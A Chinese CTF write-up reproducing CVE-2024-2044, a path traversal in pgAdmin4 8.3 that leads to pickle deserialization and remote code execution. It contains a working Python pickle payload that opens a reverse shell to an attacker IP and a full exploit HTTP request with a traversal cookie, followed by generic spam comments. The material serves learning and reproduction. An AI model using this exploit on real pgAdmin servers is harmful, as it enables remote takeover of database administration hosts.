PgAdmin4 8.3反序列化&&rceCVE-2024-2044复现,网络安全爱好者中心-神域博客网

NKCTF

cve复现详细链接

https://www.shielder.com/advisories/pgadmin-path-traversal_leads_to_unsafe_deserialization_and_rce/

打比赛时也找到了这篇文章,当时用的nc和sh反弹shell失败,遂炸裂,百思不得其解,赛后复盘失败原因

解决办法:用python shell命令弹(感谢出题人seizer,感谢晨曦师傅指点,

->晨曦师傅的博客https://chenxi9981.github.io/

图片[2],PgAdmin4 8.3反序列化&&rceCVE-2024-2044复现,网络安全爱好者中心-神域博客网

复现过程

在这篇文章当中linux提到必须有账号密码

比赛的时是用的linux环境,

比赛登录账号是：tacooooo@qq.com

密码猜测是：tacooooo

从这场比赛中我又坚定了密码不一定是弱密码,有可能与出题人的相关的这种情况

图片[3],PgAdmin4 8.3反序列化&&rceCVE-2024-2044复现,网络安全爱好者中心-神域博客网

图片[4],PgAdmin4 8.3反序列化&&rceCVE-2024-2044复现,网络安全爱好者中心-神域博客网

根据提示进行下一步上传文件

图片[5],PgAdmin4 8.3反序列化&&rceCVE-2024-2044复现,网络安全爱好者中心-神域博客网

上传文件所需要的python文件如下

exp：

import pickle
import os
import pickletools

class exp():
    def __reduce__(self):
        return (exec, ("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"yourip\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);",))

if __name__ == '__main__':
    c = exp()
    payload = pickle.dumps(c)
    with open('posix.pickle', 'wb') as f:
        f.write(payload)

此py文件将会生成posix.pickle文件

上传

图片[6],PgAdmin4 8.3反序列化&&rceCVE-2024-2044复现,网络安全爱好者中心-神域博客网

图片[7],PgAdmin4 8.3反序列化&&rceCVE-2024-2044复现,网络安全爱好者中心-神域博客网

抓包修改cookie

如果反弹成功是不响应的,此时未响应即反弹成功

图片[8],PgAdmin4 8.3反序列化&&rceCVE-2024-2044复现,网络安全爱好者中心-神域博客网

拿flag：

图片[9],PgAdmin4 8.3反序列化&&rceCVE-2024-2044复现,网络安全爱好者中心-神域博客网

POC:

POST /settings/save_tree_state/ HTTP/1.1
Host: 3a1ff75c-5a37-4834-b6ed-22d3d3738c7d.node.nkctf.yuzhian.com.cn
Content-Length: 2
X-pgA-CSRFToken: IjE0MGE3MTVmMmIzMDgwYmYwOTJmNGU5ZjUyOWJlNTQ1OTcwZTdhNDki.ZgGgmA.YDRgzezGzIulLQT1YgWn_A7Bv5c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0
Content-type: application/json
Accept: */*
Origin: http://3a1ff75c-5a37-4834-b6ed-22d3d3738c7d.node.nkctf.yuzhian.com.cn
Referer: http://3a1ff75c-5a37-4834-b6ed-22d3d3738c7d.node.nkctf.yuzhian.com.cn/browser/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie:  pga4_session=../storage/tacooooo_qq.com/posix.pickle!a; PGADMIN_LANGUAGE=en
Connection: close

{}

尾言

关于此题,部分师傅用nc反弹成功,但我在打比赛和赛后用nc反弹均失败,也排查了vps问题,在本地用不同vps互相nc反弹可以成功,但这道题无法反弹,如果师傅们用nc无法反弹建议用上面的exp生成用python命令反弹shell.

------本文已结束，感谢您的阅读------

THE END

CTF CTFshow CTF比赛题解网络安全网络攻防

评论共12条

请登录后发表评论

登录注册

只看作者

- Alverta Gutmann0
  I just wanted to drop by and say how much I appreciate your blog. Your writing style is both engaging and informative, making it a pleasure to read. Looking forward to your future posts!
  5个月前回复
- Cruz Auer0
  Your articles never fail to captivate me. Each one is a testament to your expertise and dedication to your craft. Thank you for sharing your wisdom with the world.
  5个月前回复
- Neva Hirthe0
  helloI like your writing very so much proportion we keep up a correspondence extra approximately your post on AOL I need an expert in this space to unravel my problem May be that is you Taking a look forward to see you
  5个月前回复
- Adella Becker0
  Your blog is a treasure trove of valuable insights and thought-provoking commentary. Your dedication to your craft is evident in every word you write. Keep up the fantastic work!
  5个月前回复
- Devon Hauck0
  Your blog is a testament to your dedication to your craft. Your commitment to excellence is evident in every aspect of your writing. Thank you for being such a positive influence in the online community.
  5个月前回复
- Thurman Morar0
  Your blog is a testament to your dedication to your craft. Your commitment to excellence is evident in every aspect of your writing. Thank you for being such a positive influence in the online community.
  5个月前回复
- Maddison Hodkiewicz0
  Usually I do not read article on blogs however I would like to say that this writeup very compelled me to take a look at and do so Your writing taste has been amazed me Thanks quite nice post
  5个月前回复
- Gaylord Douglas0
  you are truly a just right webmaster The site loading speed is incredible It kind of feels that youre doing any distinctive trick In addition The contents are masterwork you have done a great activity in this matter
  5个月前回复
- Heaven Reilly0
  Your blog is a constant source of inspiration for me. Your passion for your subject matter is palpable, and it's clear that you pour your heart and soul into every post. Keep up the incredible work!
  5个月前回复
- Agnes Medhurst0
  Your passion for your subject matter shines through in every post. It's clear that you genuinely care about sharing knowledge and making a positive impact on your readers. Kudos to you!
  5个月前回复
- Cordell Zulauf0
  Hi Neat post Theres an issue together with your web site in internet explorer may test this IE still is the marketplace chief and a good component of people will pass over your fantastic writing due to this problem
  5个月前回复
- Abraham Lowe0
  I just wanted to drop by and say how much I appreciate your blog. Your writing style is both engaging and informative, making it a pleasure to read. Looking forward to your future posts!
  6个月前回复